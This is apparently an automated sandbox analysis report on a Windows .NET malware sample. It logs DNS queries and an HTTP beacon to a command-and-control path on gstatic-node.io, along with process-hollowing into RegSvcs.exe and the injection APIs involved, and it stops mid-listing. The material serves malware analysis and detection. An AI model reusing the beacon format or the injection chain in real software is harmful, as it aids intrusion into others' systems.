Aug 18, 2023 00:12:35.532928944 CEST	49717	80	192.168.2.6	188.114.96.7
Aug 18, 2023 00:12:35.533107042 CEST	49717	80	192.168.2.6	188.114.96.7
Aug 18, 2023 00:12:35.706820965 CEST	49718	80	192.168.2.6	188.114.97.7
Aug 18, 2023 00:12:35.723905087 CEST	80	49718	188.114.97.7	192.168.2.6
Aug 18, 2023 00:12:35.724066973 CEST	49718	80	192.168.2.6	188.114.97.7
Aug 18, 2023 00:12:35.724385023 CEST	49718	80	192.168.2.6	188.114.97.7
Aug 18, 2023 00:12:35.742605925 CEST	80	49718	188.114.97.7	192.168.2.6
Aug 18, 2023 00:12:35.750610113 CEST	80	49718	188.114.97.7	192.168.2.6
Aug 18, 2023 00:12:35.750643969 CEST	80	49718	188.114.97.7	192.168.2.6
Aug 18, 2023 00:12:35.750664949 CEST	80	49718	188.114.97.7	192.168.2.6
Aug 18, 2023 00:12:35.750684977 CEST	80	49718	188.114.97.7	192.168.2.6
Aug 18, 2023 00:12:35.750703096 CEST	80	49718	188.114.97.7	192.168.2.6
Aug 18, 2023 00:12:35.750718117 CEST	80	49718	188.114.97.7	192.168.2.6
Aug 18, 2023 00:12:35.750727892 CEST	49718	80	192.168.2.6	188.114.97.7
Aug 18, 2023 00:12:35.750727892 CEST	49718	80	192.168.2.6	188.114.97.7
Aug 18, 2023 00:12:35.750771046 CEST	49718	80	192.168.2.6	188.114.97.7
Aug 18, 2023 00:12:35.750771046 CEST	49718	80	192.168.2.6	188.114.97.7
Aug 18, 2023 00:12:38.846185923 CEST	49718	80	192.168.2.6	188.114.97.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 18, 2023 00:12:35.418646097 CEST	54502	53	192.168.2.6	8.8.8.8
Aug 18, 2023 00:12:35.474805117 CEST	53	54502	8.8.8.8	192.168.2.6
Aug 18, 2023 00:12:35.668514013 CEST	51084	53	192.168.2.6	8.8.8.8
Aug 18, 2023 00:12:35.705334902 CEST	53	51084	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 18, 2023 00:12:35.418646097 CEST	192.168.2.6	8.8.8.8	0xf149	Standard query (0)	gstatic-node.io	A (IP address)	IN (0x0001)	false
Aug 18, 2023 00:12:35.668514013 CEST	192.168.2.6	8.8.8.8	0x75f2	Standard query (0)	gstatic-node.io	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Aug 18, 2023 00:12:35.474805117 CEST	8.8.8.8	192.168.2.6	0xf149	No error (0)	gstatic-node.io	188.114.96.7	A (IP address)	IN (0x0001)	false
Aug 18, 2023 00:12:35.474805117 CEST	8.8.8.8	192.168.2.6	0xf149	No error (0)	gstatic-node.io	188.114.97.7	A (IP address)	IN (0x0001)	false
Aug 18, 2023 00:12:35.705334902 CEST	8.8.8.8	192.168.2.6	0x75f2	No error (0)	gstatic-node.io	188.114.97.7	A (IP address)	IN (0x0001)	false
Aug 18, 2023 00:12:35.705334902 CEST	8.8.8.8	192.168.2.6	0x75f2	No error (0)	gstatic-node.io	188.114.96.7	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

gstatic-node.io

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49717	188.114.96.7	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	kBytes transferred	Direction	Data
Aug 18, 2023 00:12:35.504090071 CEST	92	OUT	GET / HTTP/1.1 Connection: Keep-Alive User-Agent: TeslaBrowser/5.5 Host: gstatic-node.io
Aug 18, 2023 00:12:35.532723904 CEST	94	IN	HTTP/1.1 200 OK Date: Thu, 17 Aug 2023 22:12:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8GB6ekAg%2Bx%2FkOFIRIX1XEEdUVtvR4qdVbk59nmOxGL5tpbcrQ2yULoLqvH0jDOY3FPi7vI0G1t9mwgFl8c1izoVjUqY0luCGfY79vWdCNxX8u6k3Ym1NcQUmGqDXkhXQxGc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7f854269e96e30e2-FRA Data Raw: 31 32 37 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63 73 73 22 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 63 73 73 22 20 2f 3e 0a 3c 21 Data Ascii: 1275<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /><!
Aug 18, 2023 00:12:35.532757044 CEST	95	IN	Data Raw: 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 27 63 66 5f 73 74 79 6c 65 73 2d 69 65 2d 63 73 73 27 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f Data Ascii: --[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEven
Aug 18, 2023 00:12:35.532777071 CEST	96	IN	Data Raw: 6f 6e 20 73 75 63 68 20 61 73 20 70 61 73 73 77 6f 72 64 73 20 61 6e 64 20 63 72 65 64 69 74 20 63 61 72 64 20 64 65 74 61 69 6c 73 20 62 79 20 70 72 65 74 65 6e 64 69 6e 67 20 74 6f 20 62 65 20 61 20 74 72 75 73 74 77 6f 72 74 68 79 20 73 6f 75 Data Ascii: on such as passwords and credit card details by pretending to be a trustworthy source.</p> <p> <form action="/cdn-cgi/phish-bypass" method="GET"> <input type="hidden" name="atok" value="es5mC20k.aGXT.a
Aug 18, 2023 00:12:35.532799006 CEST	98	IN	Data Raw: 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 Data Ascii: rder-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">7f854269e96e30e2</strong></span> <span class="cf-footer-separator sm:hi
Aug 18, 2023 00:12:35.532818079 CEST	98	IN	Data Raw: 69 76 3e 3c 21 2d 2d 20 2f 23 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 20 2d 2d 3e 0a 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 23 63 66 2d 77 72 61 70 70 65 72 20 2d 2d 3e 0a 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 77 69 6e 64 6f 77 2e Data Ascii: iv>... /#cf-error-details --> </div>... /#cf-wrapper --> <script> window._cf_translation = {}; </script></body></html>
Aug 18, 2023 00:12:35.532828093 CEST	98	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.6	49718	188.114.97.7	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	kBytes transferred	Direction	Data
Aug 18, 2023 00:12:35.724385023 CEST	99	OUT	POST /c2conf HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: gstatic-node.io Content-Length: 40 Cache-Control: no-cache Data Raw: 6c 69 64 3d 5a 32 77 4b 43 6e 2d 2d 69 6e 73 74 61 6c 6c 73 32 70 26 6a 3d 64 65 66 61 75 6c 74 26 76 65 72 3d 34 2e 30 Data Ascii: lid=Z2wKCn--installs2p&j=default&ver=4.0
Aug 18, 2023 00:12:35.750610113 CEST	100	IN	HTTP/1.1 200 OK Date: Thu, 17 Aug 2023 22:12:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vAfSX6znwhDgJVJ4PrLxLyBWaKHaN2RMIUvUV5qQVK4JGr4p0AsrgLM4d5b5ixHe4YLo%2F02bzAI8Qxbd5ccIw4DQngAdccGjRdtvs%2F34kDEQRkRmm17ThFUdB0Dui39QVPo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7f85426b4a528fe0-FRA Data Raw: 31 32 37 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63 73 73 22 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 63 73 73 22 20 2f 3e 0a 3c 21 Data Ascii: 127b<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /><!
Aug 18, 2023 00:12:35.750643969 CEST	102	IN	Data Raw: 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 27 63 66 5f 73 74 79 6c 65 73 2d 69 65 2d 63 73 73 27 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f Data Ascii: --[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEven
Aug 18, 2023 00:12:35.750664949 CEST	103	IN	Data Raw: 6f 6e 20 73 75 63 68 20 61 73 20 70 61 73 73 77 6f 72 64 73 20 61 6e 64 20 63 72 65 64 69 74 20 63 61 72 64 20 64 65 74 61 69 6c 73 20 62 79 20 70 72 65 74 65 6e 64 69 6e 67 20 74 6f 20 62 65 20 61 20 74 72 75 73 74 77 6f 72 74 68 79 20 73 6f 75 Data Ascii: on such as passwords and credit card details by pretending to be a trustworthy source.</p> <p> <form action="/cdn-cgi/phish-bypass" method="GET"> <input type="hidden" name="atok" value="LwmpfwBDMC.tfMO
Aug 18, 2023 00:12:35.750684977 CEST	104	IN	Data Raw: 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 Data Ascii: eft border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">7f85426b4a528fe0</strong></span> <span class="cf-footer-separator
Aug 18, 2023 00:12:35.750703096 CEST	104	IN	Data Raw: 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 23 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 20 2d 2d 3e 0a 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 23 63 66 2d 77 72 61 70 70 65 72 20 2d 2d 3e 0a 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 77 Data Ascii: </div>... /#cf-error-details --> </div>... /#cf-wrapper --> <script> window._cf_translation = {}; </script></body></html>
Aug 18, 2023 00:12:35.750718117 CEST	104	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: FT0uDS8neB.exePID: 6640, Parent PID: 3432

General

Target ID:	0
Start time:	00:12:32
Start date:	18/08/2023
Path:	C:\Users\user\Desktop\FT0uDS8neB.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\FT0uDS8neB.exe
Imagebase:	0xea0000
File size:	1'369'600 bytes
MD5 hash:	E6B8CFB15C6FCE9ABCEA7A716345D537
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: RegSvcs.exePID: 6672, Parent PID: 6640

General

Target ID:	1
Start time:	00:12:34
Start date:	18/08/2023
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Imagebase:	0xa00000
File size:	45'248 bytes
MD5 hash:	19855C0DC5BEC9FDF925307C57F9F5FC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 6760, Parent PID: 6672

General

Target ID:	3
Start time:	00:12:35
Start date:	18/08/2023
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6672 -s 1012
Imagebase:	0x1390000
File size:	434'592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: FT0uDS8neB.exePID: 6640, Parent PID: 3432COMMON

Execution Graph

Execution Coverage:	21.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	5.4%
Total number of Nodes:	56
Total number of Limit Nodes:	1

Executed Functions

Function 03165703 Relevance: 3.3, Instructions: 3272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.246962124.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3160000_FT0uDS8neB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4a1f515a463657cec9d297269c6be7665a957e68f3bc2da1b8695936e50d757
Instruction ID: e70c4b18fe03462699494b58425af17a688721798233b85d3017504b872b227d
Opcode Fuzzy Hash: f4a1f515a463657cec9d297269c6be7665a957e68f3bc2da1b8695936e50d757
Instruction Fuzzy Hash: 78631E74A00219CFCB24DF68C888A9DB7B6BF49314F1585D9E809AB3A5DB35ED91CF40

Uniqueness

Uniqueness Score: -1.00%

Function 03160DE7 Relevance: 2.0, Instructions: 1990
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.246962124.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3160000_FT0uDS8neB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae43d15ec9584be06624a4c55182bed0dc30bcd78db1f473858dcf8bdf0d38c9
Instruction ID: 788a60eda33ee4194141149a475abc134378972217d8cd524961cb8d13e92fb6
Opcode Fuzzy Hash: ae43d15ec9584be06624a4c55182bed0dc30bcd78db1f473858dcf8bdf0d38c9
Instruction Fuzzy Hash: 5B33A374A012298FDB65DF20DC90AAEBBB6FB8C300F5095E9D80967364DB356E91DF40

Uniqueness

Uniqueness Score: -1.00%

Function 031651F8 Relevance: 1.6, Strings: 1, Instructions: 373
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

M)q, xrefs: 03165394

Memory Dump Source

Source File: 00000000.00000002.246962124.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3160000_FT0uDS8neB.jbxd

Similarity

API ID:
String ID: M)q
API String ID: 0-1442840490
Opcode ID: 6468a9f18667611b74f8ac60c6bc8f14f8bbd26a436324fdf4b075f446826817
Instruction ID: 3206daf92b24fa56848b79dfd6f44bee91f0ae6c4e1d096100ff7cbeebf8c60c
Opcode Fuzzy Hash: 6468a9f18667611b74f8ac60c6bc8f14f8bbd26a436324fdf4b075f446826817
Instruction Fuzzy Hash: 13E18035B0021ADFCB14DFA8D858AAEB7B3BF89300F148569E8069B354DB34DD52CB91

Uniqueness

Uniqueness Score: -1.00%

Function 05A375B8 Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.249152176.0000000005A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a30000_FT0uDS8neB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd28a252b8d4a842ae04a9de28ad1a56d3386b70987074f9153b8e40ff5ef156
Instruction ID: 61982b11b1e06e96b6fec3fd9940f7ac8a3201a5c3e30ad250599a6b43749770
Opcode Fuzzy Hash: cd28a252b8d4a842ae04a9de28ad1a56d3386b70987074f9153b8e40ff5ef156
Instruction Fuzzy Hash: 3B8107B1D01229CBDB64CF66CC41BEDBBB6BF89304F1085EAE519A7240EB745AC58F50

Uniqueness

Uniqueness Score: -1.00%

Function 05A370F8 Relevance: 1.8, APIs: 1, Instructions: 321
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05A373BF

Memory Dump Source

Source File: 00000000.00000002.249152176.0000000005A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a30000_FT0uDS8neB.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 0d7838f144e95e0823ba2e90958df3742cfb253054158a05e98681c0d251e2bd
Instruction ID: f343f58ba83946099ef791a1c2800b39499d69c34e962aa87b541c94b0853321
Opcode Fuzzy Hash: 0d7838f144e95e0823ba2e90958df3742cfb253054158a05e98681c0d251e2bd
Instruction Fuzzy Hash: 3BC135B1D002298FDF24CFA8C941BEDBBB1FB49314F0091A9E919B7250DB749A85CF90

Uniqueness

Uniqueness Score: -1.00%

Function 05A36CE0 Relevance: 1.6, APIs: 1, Instructions: 116
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05A36DB3

Memory Dump Source

Source File: 00000000.00000002.249152176.0000000005A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a30000_FT0uDS8neB.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 2bc00bcc6746591c663935207d6e40c79d8f85c6903f7b0ac9eeb5d6b84abe6a
Instruction ID: 5362b149b6c10426bd37d1b9e4e8a1b1279faafbee094a0b60f101c4a8a877a3
Opcode Fuzzy Hash: 2bc00bcc6746591c663935207d6e40c79d8f85c6903f7b0ac9eeb5d6b84abe6a
Instruction Fuzzy Hash: 9841BBB4D002189FCF10CFA9D980ADEFBF1BB49314F20902AE814B7210D738AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 05B7D028 Relevance: 1.6, APIs: 1, Instructions: 112
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?), ref: 05B7D131

Memory Dump Source

Source File: 00000000.00000002.249178938.0000000005B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b70000_FT0uDS8neB.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 9a0de780ae3bf2ecc10dc07cf5abd3ebd6c4f13ae8b4a6e1aaecb69834ce4736
Instruction ID: c203feb105a6246f39e16607c22c7143272ff03fada1c953042951475fda4ab1
Opcode Fuzzy Hash: 9a0de780ae3bf2ecc10dc07cf5abd3ebd6c4f13ae8b4a6e1aaecb69834ce4736
Instruction Fuzzy Hash: CE4110B0E0024C9FDB10CFA8D994B9DBBF1FF48340F20912AE814AB254D774A885CF41

Uniqueness

Uniqueness Score: -1.00%

Function 05A36B90 Relevance: 1.6, APIs: 1, Instructions: 101
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05A36C3A

Memory Dump Source

Source File: 00000000.00000002.249152176.0000000005A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a30000_FT0uDS8neB.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 557733b7e48e96cef2a3f94e2303f0ba3cb51e333380e5b1e3d5fe1dafe971be
Instruction ID: 6b759e1a17c56c3e8706dcacff6997e613322377d87e9ae82c8720af844678f5
Opcode Fuzzy Hash: 557733b7e48e96cef2a3f94e2303f0ba3cb51e333380e5b1e3d5fe1dafe971be
Instruction Fuzzy Hash: 703187B9D002589FCF10CFA9E980A9EFBB5AB49314F10A42AE814B7214D735A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 05A369A8 Relevance: 1.6, APIs: 1, Instructions: 94
threadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadContext.KERNELBASE(?,?), ref: 05A36A57

Memory Dump Source

